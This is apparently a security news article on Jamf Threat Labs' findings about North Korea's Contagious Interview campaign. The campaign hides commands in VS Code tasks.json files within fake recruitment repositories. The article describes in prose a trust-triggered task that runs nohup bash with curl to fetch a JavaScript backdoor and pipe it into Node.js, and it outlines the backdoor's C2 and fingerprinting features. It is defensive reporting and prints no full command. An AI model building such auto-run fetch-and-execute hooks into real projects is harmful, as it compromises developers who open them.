Jamf Threat Labs documents new infection techniques in Contagious Interview campaign exploiting VS Code configurations to deploy JavaScript backdoors.
Security researchers have identified an evolution in how North Korean state-sponsored hackers exploit Microsoft Visual Studio Code for malware deployment. The latest findings from Jamf Threat Labs reveal expanded abuse of VS Code's task configuration system in the ongoing Contagious Interview campaign, which primarily targets developers through fake job recruitment schemes.
Exploiting Development Workflows
The attack begins when targets clone malicious repositories from GitHub or GitLab under the guise of technical recruitment tests. When opened in VS Code, victims receive a prompt to trust the repository author. Granting trust triggers automatic execution of malicious commands embedded in the repository's tasks.json configuration file.
On macOS systems, this executes a background command using nohup bash -c combined with curl -s to fetch a JavaScript payload from attacker-controlled infrastructure. The payload is piped directly into Node.js, allowing execution to persist even if VS Code is closed. Recent payloads have been hosted on vercel.app domains, marking a shift from previously used infrastructure.
Deobfuscating the Payload
The JavaScript payload (SHA256: 932a67816b10a34d05a2621836cdf7fbf0628bbfdf66ae605c5f23455de1e0bc) contains significant obfuscation through unused functions and redundant logic. However, core functionality remains focused on three key capabilities:
- Remote Code Execution: A function allows dynamic execution of attacker-supplied JavaScript strings, including importing Node.js modules for expanded capabilities
- System Fingerprinting: Collects hostnames, MAC addresses, OS details, and public IPs via ipify.org
- Command-and-Control: Beaconing occurs every 5 seconds to a C2 server, transmitting system data and awaiting instructions
Operational Patterns and Limitations
Approximately eight minutes after initial infection, secondary JavaScript payloads are typically delivered. These exhibit similar functionality but with notable characteristics:
- Execution within child processes
- Self-cleanup capabilities upon command
- Code structure suggesting AI-assisted generation
Despite its persistence mechanism, the malware shows technical limitations. Significant portions of the payload serve no operational purpose, suggesting either deliberate obfuscation or development inefficiencies. The C2 protocol remains basic, lacking encryption or sophisticated evasion techniques.
Defense Recommendations
Developers should:
- Vet repositories thoroughly before granting trust in VS Code
- Inspect
tasks.json,package.json, and install scripts in unfamiliar projects - Use security solutions like Jamf Threat Prevention with Advanced Threat Controls enabled
This activity demonstrates North Korean threat actors' continued adaptation to developer environments. As Jamf Threat Labs notes, these groups consistently refine delivery mechanisms to exploit trusted development tools, requiring heightened vigilance when interacting with third-party code.
Indicators of Compromise and technical analysis available in Jamf's full report.
Comments
Please log in or register to join the discussion